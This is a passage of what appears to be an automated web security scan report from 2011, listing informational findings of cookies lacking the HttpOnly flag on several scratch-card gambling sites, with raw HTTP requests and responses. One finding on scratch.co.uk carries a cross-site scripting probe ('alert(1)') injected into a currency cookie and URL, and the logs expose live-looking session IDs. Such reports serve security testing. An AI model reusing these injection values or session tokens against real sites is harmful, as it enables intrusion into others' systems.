Path:	/images/InviteFriend.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:02 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.150. http://primescratchcards.com/images/Responsible.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/Responsible.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.151. http://primescratchcards.com/images/SecurityAndPrivacy.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/SecurityAndPrivacy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.152. http://primescratchcards.com/images/aboutus.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/aboutus.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:02 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.153. http://primescratchcards.com/images/affiliates.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/affiliates.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.154. http://primescratchcards.com/images/contactus.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/contactus.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.155. http://primescratchcards.com/images/fairplay.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/fairplay.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:02 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

12.156. http://primescratchcards.com/images/help.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/help.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.157. http://primescratchcards.com/images/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/index.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:00 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

12.158. http://primescratchcards.com/images/media.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/media.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.159. http://primescratchcards.com/images/playersclub.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/playersclub.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:08 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.160. http://primescratchcards.com/images/promotions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/promotions.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:04 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:04 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.161. http://primescratchcards.com/images/terms.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/terms.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.162. http://primescratchcards.com/images/underage.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/underage.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:20 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:20 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.163. http://pt.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
UniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pahz1f55bifuak454oua1545; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: UniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.164. http://pt.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=582C4C70EA7E56EDD6D14F40E161EA4F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:01:31 GMT; path=/
UniqueVisitorID=582C4C70EA7E56EDD6D14F40E161EA4F; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.165. http://pt.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_1=EncryptedUniqueVisitorID=4B1905225FA4B80745F583B7A7A6774D&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:20:36 GMT; path=/
UniqueVisitorID=4B1905225FA4B80745F583B7A7A6774D; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.166. http://pt.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_8=EncryptedUniqueVisitorID=BC872EF8D517737D5602A1CEA609E353&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
UniqueVisitorID=BC872EF8D517737D5602A1CEA609E353; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1ezix3mzcpqnyv3il13wvcqv; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=BC872EF8D517737D5602A1CEA609E353&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=BC872EF8D517737D5602A1CEA609E353; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.167. http://scratch.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:01 GMT; path=/
currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:59:01 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:01 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:01 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:59:01 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:01 GMT; path=/
Content-Type: text/html
Content-Length: 11133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.168. http://scratch.co.uk/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/about/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:41 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
